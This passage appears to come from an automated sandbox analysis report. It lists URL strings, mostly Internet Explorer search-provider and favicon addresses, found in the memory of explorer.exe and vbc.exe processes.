Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2182872595.0000000002726000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2204888714.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2182475008.0000000001202000.00000020.00020000.sdmp, vbc.exe, 00000005.00000002.2230139521.0000000001202000.00000020.00020000.sdmp String found in binary or memory: http://weather.gc.ca/astro/seeing_e.html)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2393631974.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
